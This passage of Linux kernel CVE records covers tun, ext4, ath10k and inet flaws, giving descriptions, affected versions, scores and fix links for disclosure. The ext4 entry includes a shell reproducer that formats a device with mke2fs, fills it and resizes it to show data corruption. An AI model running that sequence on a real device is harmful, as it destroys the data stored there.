"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntun: limit printing rate when illegal packet received by tun dev\n\nvhost_worker will call tun call backs to receive packets. If too many\nillegal packets arrives, tun_do_read will keep dumping packet contents.\nWhen console is enabled, it will costs much more cpu time to dump\npacket and soft lockup will be detected.\n\nnet_ratelimit mechanism can be used to limit the dumping rate.\n\nPID: 33036 TASK: ffff949da6f20000 CPU: 23 COMMAND: \"vhost-32980\"\n #0 [fffffe00003fce50] crash_nmi_callback at ffffffff89249253\n #1 [fffffe00003fce58] nmi_handle at ffffffff89225fa3\n #2 [fffffe00003fceb0] default_do_nmi at ffffffff8922642e\n #3 [fffffe00003fced0] do_nmi at ffffffff8922660d\n #4 [fffffe00003fcef0] end_repeat_nmi at ffffffff89c01663\n [exception RIP: io_serial_in+20]\n RIP: ffffffff89792594 RSP: ffffa655314979e8 RFLAGS: 00000002\n RAX: ffffffff89792500 RBX: ffffffff8af428a0 RCX: 0000000000000000\n RDX: 00000000000003fd RSI: 0000000000000005 RDI: ffffffff8af428a0\n RBP: 0000000000002710 R8: 0000000000000004 R9: 000000000000000f\n R10: 0000000000000000 R11: ffffffff8acbf64f R12: 0000000000000020\n R13: ffffffff8acbf698 R14: 0000000000000058 R15: 0000000000000000\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n #5 [ffffa655314979e8] io_serial_in at ffffffff89792594\n #6 [ffffa655314979e8] wait_for_xmitr at ffffffff89793470\n #7 [ffffa65531497a08] serial8250_console_putchar at ffffffff897934f6\n #8 [ffffa65531497a20] uart_console_write at ffffffff8978b605\n #9 [ffffa65531497a48] serial8250_console_write at ffffffff89796558\n #10 [ffffa65531497ac8] console_unlock at ffffffff89316124\n #11 [ffffa65531497b10] vprintk_emit at ffffffff89317c07\n #12 [ffffa65531497b68] printk at ffffffff89318306\n #13 [ffffa65531497bc8] print_hex_dump at ffffffff89650765\n #14 [ffffa65531497ca8] tun_do_read at ffffffffc0b06c27 [tun]\n #15 [ffffa65531497d38] tun_recvmsg at ffffffffc0b06e34 [tun]\n #16 [ffffa65531497d68] handle_rx at ffffffffc0c5d682 [vhost_net]\n #17 [ffffa65531497ed0] vhost_worker at ffffffffc0c644dc [vhost]\n #18 [ffffa65531497f10] kthread at ffffffff892d2e72\n #19 [ffffa65531497f50] ret_from_fork at ffffffff89c0022f"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:10.668Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/68459b8e3ee554ce71878af9eb69659b9462c588"
},
{
"url": "https://git.kernel.org/stable/c/4b0dcae5c4797bf31c63011ed62917210d3fdac3"
},
{
"url": "https://git.kernel.org/stable/c/14cdb43dbc827e18ac7d5b30c5b4c676219f1421"
},
{
"url": "https://git.kernel.org/stable/c/a50dbeca28acf7051dfa92786b85f704c75db6eb"
},
{
"url": "https://git.kernel.org/stable/c/62e27ef18eb4f0d33bbae8e9ef56b99696a74713"
},
{
"url": "https://git.kernel.org/stable/c/40f4ced305c6c47487d3cd8da54676e2acc1a6ad"
},
{
"url": "https://git.kernel.org/stable/c/52854101180beccdb9dc2077a3bea31b6ad48dfa"
},
{
"url": "https://git.kernel.org/stable/c/f8bbc07ac535593139c875ffa19af924b1084540"
}
],
"title": "tun: limit printing rate when illegal packet received by tun dev",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27013",
"datePublished": "2024-05-01T05:29:42.289Z",
"dateReserved": "2024-02-19T14:20:24.209Z",
"dateUpdated": "2025-11-04T17:17:07.558Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35807 (GCVE-0-2024-35807)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix corruption during on-line resize
We observed a corruption during on-line resize of a file system that is
larger than 16 TiB with 4k block size. With having more then 2^32 blocks
resize_inode is turned off by default by mke2fs. The issue can be
reproduced on a smaller file system for convenience by explicitly
turning off resize_inode. An on-line resize across an 8 GiB boundary (the
size of a meta block group in this setup) then leads to a corruption:
dev=/dev/<some_dev> # should be >= 16 GiB
mkdir -p /corruption
/sbin/mke2fs -t ext4 -b 4096 -O ^resize_inode $dev $((2 * 2**21 - 2**15))
mount -t ext4 $dev /corruption
dd if=/dev/zero bs=4096 of=/corruption/test count=$((2*2**21 - 4*2**15))
sha1sum /corruption/test
# 79d2658b39dcfd77274e435b0934028adafaab11 /corruption/test
/sbin/resize2fs $dev $((2*2**21))
# drop page cache to force reload the block from disk
echo 1 > /proc/sys/vm/drop_caches
sha1sum /corruption/test
# 3c2abc63cbf1a94c9e6977e0fbd72cd832c4d5c3 /corruption/test
2^21 = 2^15*2^6 equals 8 GiB whereof 2^15 is the number of blocks per
block group and 2^6 are the number of block groups that make a meta
block group.
The last checksum might be different depending on how the file is laid
out across the physical blocks. The actual corruption occurs at physical
block 63*2^15 = 2064384 which would be the location of the backup of the
meta block group's block descriptor. During the on-line resize the file
system will be converted to meta_bg starting at s_first_meta_bg which is
2 in the example - meaning all block groups after 16 GiB. However, in
ext4_flex_group_add we might add block groups that are not part of the
first meta block group yet. In the reproducer we achieved this by
substracting the size of a whole block group from the point where the
meta block group would start. This must be considered when updating the
backup block group descriptors to follow the non-meta_bg layout. The fix
is to add a test whether the group to add is already part of the meta
block group or not.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 Version: 01f795f9e0d67adeccc61a8b20c28acb45fa5fd8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35807",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:25:51.499528Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:26:07.895Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.537Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75cc31c2e7193b69f5d25650bda5bb42ed92f8a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee4e9c1976147a850f6085a13fca95bcaa00d84c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8e8b197317228b5089ed9e7802dadf3ccaa027a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/239c669edb2bffa1aa2612519b1d438ab35d6be6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb1088d51bbaa0faec5a55d4f5818a9ab79e24df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37b6a3ba793bbbae057f5b991970ebcc52cb3db5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b461910af8ba3bed80f48c2bf852686d05c6fc5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/722d2c01b8b108f8283d1b7222209d5b2a5aa7bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6b3bfe176e8a5b05ec4447404e412c2a3fc92cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/resize.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "75cc31c2e7193b69f5d25650bda5bb42ed92f8a1",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "ee4e9c1976147a850f6085a13fca95bcaa00d84c",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "e8e8b197317228b5089ed9e7802dadf3ccaa027a",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "239c669edb2bffa1aa2612519b1d438ab35d6be6",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "fb1088d51bbaa0faec5a55d4f5818a9ab79e24df",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "37b6a3ba793bbbae057f5b991970ebcc52cb3db5",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "b461910af8ba3bed80f48c2bf852686d05c6fc5c",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "722d2c01b8b108f8283d1b7222209d5b2a5aa7bd",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
},
{
"lessThan": "a6b3bfe176e8a5b05ec4447404e412c2a3fc92cc",
"status": "affected",
"version": "01f795f9e0d67adeccc61a8b20c28acb45fa5fd8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/resize.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix corruption during on-line resize\n\nWe observed a corruption during on-line resize of a file system that is\nlarger than 16 TiB with 4k block size. With having more then 2^32 blocks\nresize_inode is turned off by default by mke2fs. The issue can be\nreproduced on a smaller file system for convenience by explicitly\nturning off resize_inode. An on-line resize across an 8 GiB boundary (the\nsize of a meta block group in this setup) then leads to a corruption:\n\n dev=/dev/\u003csome_dev\u003e # should be \u003e= 16 GiB\n mkdir -p /corruption\n /sbin/mke2fs -t ext4 -b 4096 -O ^resize_inode $dev $((2 * 2**21 - 2**15))\n mount -t ext4 $dev /corruption\n\n dd if=/dev/zero bs=4096 of=/corruption/test count=$((2*2**21 - 4*2**15))\n sha1sum /corruption/test\n # 79d2658b39dcfd77274e435b0934028adafaab11 /corruption/test\n\n /sbin/resize2fs $dev $((2*2**21))\n # drop page cache to force reload the block from disk\n echo 1 \u003e /proc/sys/vm/drop_caches\n\n sha1sum /corruption/test\n # 3c2abc63cbf1a94c9e6977e0fbd72cd832c4d5c3 /corruption/test\n\n2^21 = 2^15*2^6 equals 8 GiB whereof 2^15 is the number of blocks per\nblock group and 2^6 are the number of block groups that make a meta\nblock group.\n\nThe last checksum might be different depending on how the file is laid\nout across the physical blocks. The actual corruption occurs at physical\nblock 63*2^15 = 2064384 which would be the location of the backup of the\nmeta block group\u0027s block descriptor. During the on-line resize the file\nsystem will be converted to meta_bg starting at s_first_meta_bg which is\n2 in the example - meaning all block groups after 16 GiB. However, in\next4_flex_group_add we might add block groups that are not part of the\nfirst meta block group yet. In the reproducer we achieved this by\nsubstracting the size of a whole block group from the point where the\nmeta block group would start. This must be considered when updating the\nbackup block group descriptors to follow the non-meta_bg layout. The fix\nis to add a test whether the group to add is already part of the meta\nblock group or not."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:50.120Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/75cc31c2e7193b69f5d25650bda5bb42ed92f8a1"
},
{
"url": "https://git.kernel.org/stable/c/ee4e9c1976147a850f6085a13fca95bcaa00d84c"
},
{
"url": "https://git.kernel.org/stable/c/e8e8b197317228b5089ed9e7802dadf3ccaa027a"
},
{
"url": "https://git.kernel.org/stable/c/239c669edb2bffa1aa2612519b1d438ab35d6be6"
},
{
"url": "https://git.kernel.org/stable/c/fb1088d51bbaa0faec5a55d4f5818a9ab79e24df"
},
{
"url": "https://git.kernel.org/stable/c/37b6a3ba793bbbae057f5b991970ebcc52cb3db5"
},
{
"url": "https://git.kernel.org/stable/c/b461910af8ba3bed80f48c2bf852686d05c6fc5c"
},
{
"url": "https://git.kernel.org/stable/c/722d2c01b8b108f8283d1b7222209d5b2a5aa7bd"
},
{
"url": "https://git.kernel.org/stable/c/a6b3bfe176e8a5b05ec4447404e412c2a3fc92cc"
}
],
"title": "ext4: fix corruption during on-line resize",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35807",
"datePublished": "2024-05-17T13:23:14.869Z",
"dateReserved": "2024-05-17T12:19:12.342Z",
"dateUpdated": "2025-05-04T09:05:50.120Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-7042 (GCVE-0-2023-7042)
Vulnerability from cvelistv5
Published
2023-12-21 20:02
Modified
2025-11-21 06:23
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 6 |
cpe:/o:redhat:enterprise_linux:6 |
||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:50:07.943Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-7042"
},
{
"name": "RHBZ#2255497",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255497"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/54PLF5J33IRSLSR4UU6LQSMXX6FI5AOQ/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C25BK2YH5MZ6VNQXKF2NAJBTGXVEPKGC/"
},
{
"tags": [
"x_transferred"
],
"url": "https://patchwork.kernel.org/project/linux-wireless/patch/20231208043433.271449-1-hdthky0@gmail.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-7042",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T14:50:17.331103Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-27T15:00:46.793Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Xingyuan Mo of IceSword Lab for reporting this issue."
}
],
"datePublic": "2023-12-08T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Low"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-21T06:23:46.282Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-7042"
},
{
"name": "RHBZ#2255497",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255497"
},
{
"url": "https://patchwork.kernel.org/project/linux-wireless/patch/20231208043433.271449-1-hdthky0@gmail.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-12-21T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-08T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: null pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev()",
"x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-7042",
"datePublished": "2023-12-21T20:02:16.249Z",
"dateReserved": "2023-12-21T10:36:53.948Z",
"dateUpdated": "2025-11-21T06:23:46.282Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26679 (GCVE-0-2024-26679)
Vulnerability from cvelistv5
Published
2024-04-02 07:01
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
inet: read sk->sk_family once in inet_recv_error()
inet_recv_error() is called without holding the socket lock.
IPv6 socket could mutate to IPv4 with IPV6_ADDRFORM
socket option and trigger a KCSAN warning.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: f4713a3dfad045d46afcb9c2a7d0bba288920ed4 Version: 433337f9c00cac447d020922f59237273f5d92be |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26679",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-02T18:38:38.646941Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:50.171Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.659Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/caa064c3c2394d03e289ebd6b0be5102eb8a5b40"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5993f121fbc01dc2d734f0ff2628009b258fb1dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88081ba415224cf413101def4343d660f56d082b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3266e638ba5cc1165f5e6989eb8c0720f1cc4b41"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54538752216bf89ee88d47ad07802063a498c299"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a5e31bdd3c1702b520506d9cf8c41085f75c7f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/307fa8a75ab7423fa5c73573ec3d192de5027830"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eef00a82c568944f113f2de738156ac591bbd5cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/af_inet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "caa064c3c2394d03e289ebd6b0be5102eb8a5b40",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "5993f121fbc01dc2d734f0ff2628009b258fb1dd",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "88081ba415224cf413101def4343d660f56d082b",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "3266e638ba5cc1165f5e6989eb8c0720f1cc4b41",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "54538752216bf89ee88d47ad07802063a498c299",
"status": "affected",
